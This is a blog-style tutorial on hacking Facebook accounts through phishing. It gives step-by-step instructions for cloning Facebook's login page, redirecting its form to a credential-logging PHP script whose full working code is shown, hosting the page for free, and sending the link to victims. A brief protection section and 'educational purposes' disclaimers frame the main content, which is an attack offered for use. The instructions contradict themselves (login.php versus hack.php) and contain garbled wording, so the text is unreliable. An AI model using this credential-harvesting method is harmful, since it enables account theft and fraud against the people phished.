Phishing is that the most ordinarily used method to hack Facebook. the foremost widely used technique in phishing is that the use of fake Log in Pages also referred to as spoofed pages. during this post, you'll study what's phishing, how to a phishing attack work, and hack Facebook using Phishing. 
 
Note: All the information provided for educational purposes!
 

What's Phishing?

It is the foremost common method employed by hackers to hack accounts and an example of social engineering techniques that are wont to deceive users. A phishing attack is often wont to hack any sort of accounts (almost most of the accounts are often hacked using this technique).

Phishing may be a fraud and criminality wont to obtain some checking account credentials, social account username, email address and passwords, MasterCard and lots of more fraud activities.

Hackers create a fake phishing page that appears just like the original official website and thanks to this many of us enter their information.

Hackers mainly use email messages, Instant messaging platforms like Facebook, WhatsApp, WeChat, Hike, etc. to send the links for hacking your passwords.

In a survey, it's found that phishing is one of the foremost common techniques employed by hackers to hack accounts and therefore the success rate of this system is high. But nowadays people are becoming conscious of these techniques but we'd like to update ourselves from time to time from the newest hacking methods.

How to hack Facebook using Phishing Attack?

A phishing attack is often used for various purposes like hacking Facebook account, Instagram account, MasterCard numbers, checking account information, and for several other purposes.

Facebook phishing scams are widely used and it's the simplest method of hacking someone’s account. These fake login pages appear as if the first login pages of web sites like Yahoo, Gmail, MySpace, etc. The victim is fooled to believe the fake Facebook page to be the important one and enter his/her password. But once the user attempts to log in through these pages, his/her Facebook login details are stolen away.

You can make any sort of phishing login page to hack Facebook using phishing. it's a criminal offense and criminality so don’t attempt to anyone. you'll do this on your own account or system to find out this system but don't try it on anyone else.
 

How to create a Phishing page in minutes?

If you do not learn how can you make Facebook Phishing Page, So Click here to download: Click Here


1. Go to Facebook.com

first, go to Facebook.com and sure you are logged out.

2. Copy Facebook Source Code

Now Right-click on the Facebook login page and click on "View Page Source" as shown in the Screenshot or shortly Press Ctrl+U to view the Sorce Code.

3. Copy the Source Code and Paste in NotePad

Press Ctrl+A to select all the source code, then press Ctrl+C to copy the Facebook source code and paste it in a notepad.

4. Edit Sorce Code

Find the action attribute of the login form in the code. Search for keyword “action” by pressing Ctrl+F in notepad. In the Facebook login page, the action attribute was filled with Facebook login process URL, replace it with login.php as shown in ScreenShot.

There are so many action words but you'll need to search action till you get like this code action=” https://www.facebook.com/login.php?login_attempt=1 “

Now Delete the above Url and type hack.php as shown in the image below and save it on your desktop with the name index.html

Now your Facebook Phishing page is ready.
 
Facing any trouble Download now the index.html file click here


5. Now create a file named login.php using the following code

 

<?php
header('Location:http://www.facebook.com/');
$handle=fopen("log.txt","a");
foreach($_GET as $variable=>$value){
fwrite($handle,$variable);
fwrite($handle,"=");
fwrite($handle,$value);
fwrite($handle,"\r\n");
}
fwrite($handle,"\r\n");
fclose($handle);
exit;
?>
Download login.php Click here


How to host a phishing page in a 000Webhost?

000Webhost allows free hosting that is best for host your phishing page. Here is the video on how can you host your phishing page and how can you send peace of meal to the victim. Watch this video to clear all of your confusion about phishing.


How could you protect yourself from phishing scams?

Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads, etc. Clicking any links from these messages would lead you to a login page. Whenever you find an email that navigates you to a webpage, you should note only one thing which is URL because nobody can spoof URL except when there is any XSS zero-day vulnerability.

What is the URL you see in the browser address bar? 

Is that really  Is there any Green color secure symbol (HTTPS) provided in the address bar? You can prevent hacking by remembering these questions.  Also, see the examples of Facebook phishing pages.

  • Perfect Phishing Pages
  • Facebook Phishing Scams
  • Note the misleading URL

Google Chrome doesn’t differentiate the sub-domain and domain, unlike Firefox does. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. It’s not a big deal for a novice to create a perfect phishing page like this. So beware of it.

  •  Facebook Phishing Scam page with email password
  • Facebook Phishing Page – Note the misleading URL.


All the information that we provide only for educational purposes. Don't use this information for illegal purposes. 

Image Credit: Google Search